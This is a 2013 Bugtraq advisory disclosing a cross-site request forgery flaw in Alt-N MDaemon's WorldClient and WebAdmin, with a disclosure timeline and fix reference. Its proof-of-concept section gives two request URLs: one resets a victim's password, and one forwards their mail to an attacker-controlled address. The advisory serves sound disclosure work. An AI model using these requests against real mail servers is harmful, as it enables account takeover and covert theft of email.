Bugtraq mailing list archives

Alt-N MDaemon's WorldClient & WebAdmin Cross-Site Request Forgery Vulnerability

From: demetris papapetrou <demetrispapapetrou () gmail com>
Date: Wed, 20 Feb 2013 15:10:22 +0200

=====================================================================================
   Alt-N MDaemon's WorldClient & WebAdmin Cross-Site Request Forgery
Vulnerability
=====================================================================================

Software:  Alt-N MDaemon v13.0.3 and prior versions
Vendor: http://www.altn.com/
Vuln Type: Cross-Site Request Forgery
Remote: Yes
Local: No
Discovered by: QSecure and Demetris Papapetrou
References: http://www.qsecure.com.cy/advisories/Alt-N_MDaemon_WorldClient_and_WebAdmin_CSRF.html
Discovered: 25/07/2012
Reported: 19/12/2012
Fixed: 15/01/2013 (http://files.altn.com/MDaemon/Release/RelNotes_en.html)
Disclosed: 18/02/2013

VULNERABILITY DESCRIPTION:
==========================
Alt-N WorldClient and WebAdmin applications are prone to a cross-site
request-forgery vulnerability. It should be noted that partial
protection is provided by the Session parameter, but this alone cannot
be considered as an adequate protection mechanism.

An attacker can exploit this issue to perform different actions on the
affected application without the user's consent. For example, the
attacker can change the user's password, forward a copy of the user's
emails to a different email account, retrieve his/her address book,
send email messages to other users/email addresses and/or perform
other similar tasks.

Alt-N MDaemon v13.0.3 & v12.5.6 were tested and found vulnerable;
other versions may also be affected.

PoC Exploit:
============
Change Password:
http://www.example.com:3000/WorldClient.dll?Session=[SESSION_ID]&View=Options-Prefs&Reload=false&Save=Yes&ReturnJavaScript=Yes&ContentType=javascript&Password=Letme1n&ConfirmPassword=Letme1n

Enable Forwarding:
http://www.example.com:3000/WorldClient.dll?Session=[SESSION_ID]&View=Options-Prefs&Reload=false&Save=Yes&ReturnJavaScript=Yes&ContentType=javascript&ForwardingEnabled=Yes&ForwardingRetainCopy=Yes&ForwardingAddress=evil%40example.com

Current thread:

Alt-N MDaemon's WorldClient & WebAdmin Cross-Site Request Forgery Vulnerability demetris papapetrou (Feb 20)